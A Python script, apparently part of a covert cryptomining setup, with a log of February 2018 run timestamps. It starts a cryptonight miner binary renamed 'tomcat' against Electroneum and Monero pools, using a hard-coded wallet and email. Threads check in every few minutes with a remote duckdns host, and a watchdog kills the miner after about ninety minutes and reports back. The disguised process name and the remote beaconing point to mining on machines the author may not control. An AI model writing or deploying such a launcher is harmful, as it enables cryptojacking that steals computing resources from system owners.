import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:37:04.668669
#2018-02-17 16:23:04.312639
#2018-02-17 18:10:07.868353
#2018-02-17 19:58:05.189686
#2018-02-17 21:47:01.770877
#2018-02-17 23:32:06.071693
#2018-02-18 01:21:01.920293
#2018-02-18 03:08:07.318445
#2018-02-18 04:55:01.638150
#2018-02-18 06:44:07.025514
#2018-02-18 08:32:06.526887
#2018-02-18 10:19:04.175377
#2018-02-18 12:05:06.550564
#2018-02-18 13:50:07.216709
#2018-02-18 15:40:04.259730
#2018-02-18 17:29:01.406316
#2018-02-18 19:17:06.167534
#2018-02-18 21:04:01.836465
#2018-02-18 22:51:05.897403
#2018-02-19 00:39:04.046405
#2018-02-19 02:25:04.190452
#2018-02-19 04:11:08.187758
#2018-02-19 05:55:07.096253
#2018-02-19 07:43:06.995293
#2018-02-19 09:33:01.496714
#2018-02-19 11:23:05.679855
#2018-02-19 13:10:03.133266
#2018-02-19 14:58:10.641806
#2018-02-19 16:48:04.864503
#2018-02-19 18:34:04.679106
#2018-02-19 20:19:08.606572
#2018-02-19 22:08:04.093153
#2018-02-19 23:54:05.577101
#2018-02-20 01:41:06.120150
#2018-02-20 03:29:05.556080
#2018-02-20 05:16:03.598369
#2018-02-20 06:58:07.610808
#2018-02-20 08:45:06.364287
#2018-02-20 10:29:04.388356
#2018-02-20 12:14:04.220271
#2018-02-20 14:01:01.617380
#2018-02-20 15:44:06.082654
#2018-02-20 17:31:08.726570
#2018-02-20 19:20:07.076714
#2018-02-20 21:08:06.061961
#2018-02-20 22:53:07.687914
#2018-02-21 00:37:07.084201
#2018-02-21 02:24:04.182671
#2018-02-21 04:10:08.152203
#2018-02-21 05:57:05.351809
#2018-02-21 07:45:09.641580
#2018-02-21 09:35:03.185207
#2018-02-21 11:23:02.050156
#2018-02-21 13:11:09.097508
#2018-02-21 14:56:07.424567
#2018-02-21 16:45:12.762895
#2018-02-21 18:37:01.639965
#2018-02-21 20:22:01.290794
#2018-02-21 22:10:09.499953
#2018-02-21 23:58:01.296669
#2018-02-22 01:48:01.435205
#2018-02-22 03:35:04.545639
#2018-02-22 05:22:03.630919
#2018-02-22 07:06:05.311888
#2018-02-22 08:54:02.184803
#2018-02-22 10:41:06.290453
#2018-02-22 12:27:01.971862
#2018-02-22 14:12:10.469579
#2018-02-22 15:59:13.540804
#2018-02-22 17:46:05.049017
#2018-02-22 19:32:08.207898
#2018-02-22 21:24:05.077880
#2018-02-22 23:09:07.421571
#2018-02-23 00:56:05.624946
#2018-02-23 02:44:07.103692
#2018-02-23 04:33:04.277088
#2018-02-23 06:19:05.051482
#2018-02-23 08:06:04.295874
#2018-02-23 10:23:05.297204
#2018-02-23 12:16:01.762468
#2018-02-23 14:06:06.842800
#2018-02-23 15:56:05.949504
#2018-02-23 17:42:07.671290
#2018-02-23 19:28:05.413228
#2018-02-23 21:12:08.933669
#2018-02-23 22:59:04.737832
#2018-02-24 00:46:06.696034
#2018-02-24 02:40:05.585706
#2018-02-24 04:34:04.980438
#2018-02-24 06:19:01.783023
#2018-02-24 08:06:06.075838
#2018-02-24 09:52:05.389245
#2018-02-24 11:47:04.013644
#2018-02-24 13:38:04.805800
#2018-02-24 15:26:02.202209
#2018-02-24 17:15:01.768375
#2018-02-24 19:06:05.879345
#2018-02-24 20:54:02.020895
#2018-02-24 23:18:05.038384
#2018-02-25 02:42:07.104676
#2018-02-25 06:28:03.952709